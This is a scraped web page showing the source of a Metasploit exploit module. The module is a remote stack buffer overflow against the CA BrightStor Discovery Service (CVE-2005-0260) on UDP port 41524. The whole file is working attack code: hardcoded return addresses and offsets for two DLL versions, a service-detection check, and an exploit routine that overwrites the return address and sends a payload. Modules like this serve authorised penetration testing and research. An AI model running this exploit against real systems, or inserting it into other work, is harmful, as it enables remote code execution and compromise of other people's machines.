Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/discovery_udp.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Udp

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'CA BrightStor Discovery Service Stack Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a vulnerability in the CA BrightStor

19
          Discovery Service. This vulnerability occurs when a large

20
          request is sent to UDP port 41524, triggering a stack buffer

21
          overflow.

22
        },

23
        'Author' => [ 'hdm', 'aushack' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2005-0260'],

27
          [ 'OSVDB', '13613'],

28
          [ 'BID', '12491'],

29
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],

30
        ],

31
        'Privileged' => true,

32
        'Payload' => {

33
          'Space' => 2048,

34
          'BadChars' => "\x00",

35
          'StackAdjustment' => -3500,

36
        },

37
        'Platform' => %w{win},

38
        'Targets' => [

39
          [

40
            'cheyprod.dll 12/12/2003',

41
            {

42
              'Platform' => 'win',

43
              'Ret' => 0x23808eb0, # call to edi reg

44
              'Offset' => 968,

45
            },

46
          ],

47
          [

48
            'cheyprod.dll 07/21/2004',

49
            {

50
              'Platform' => 'win',

51
              'Ret' => 0x2380a908, # call edi

52
              'Offset' => 970,

53
            },

54
          ],

55
        ],

56
        'DisclosureDate' => '2004-12-20',

57
        'DefaultTarget' => 0,

58
        'Notes' => {

59
          'Reliability' => UNKNOWN_RELIABILITY,

60
          'Stability' => UNKNOWN_STABILITY,

61
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

62
        }

63
      )

64
    )

65


66
    register_options(

67
      [

68
        Opt::RPORT(41524)

69
      ]

70
    )

71
  end

72


73
  def check

74
    # The first request should have no reply

75
    csock = Rex::Socket::Tcp.create(

76
      'PeerHost' => datastore['RHOST'],

77
      'PeerPort' => 41523,

78
      'Context' =>

79
        {

80
          'Msf' => framework,

81
          'MsfExploit' => self,

82
        }

83
    )

84


85
    csock.put('META')

86
    x = csock.get_once(-1, 3)

87
    csock.close

88


89
    # The second request should be replied with the host name

90
    csock = Rex::Socket::Tcp.create(

91
      'PeerHost' => datastore['RHOST'],

92
      'PeerPort' => 41523,

93
      'Context' =>

94
        {

95
          'Msf' => framework,

96
          'MsfExploit' => self,

97
        }

98
    )

99


100
    csock.put('hMETA')

101
    y = csock.get_once(-1, 3)

102
    csock.close

103


104
    if (y and not x)

105
      return Exploit::CheckCode::Detected

106
    end

107


108
    return Exploit::CheckCode::Safe

109
  end

110


111
  def exploit

112
    connect_udp

113


114
    print_status("Trying target #{target.name}...")

115


116
    buf = rand_text_english(4096)

117


118
    # Target 0:

119
    #

120
    # esp @ 971

121
    # ret @ 968

122
    # edi @ 1046

123
    # end = 4092

124


125
    buf[target['Offset'], 4] = [ target.ret ].pack('V')

126
    buf[1046, payload.encoded.length] = payload.encoded

127


128
    udp_sock.put(buf)

129
    udp_sock.recvfrom(8192)

130


131
    handler

132
    disconnect_udp

133
  end

134
end

135


136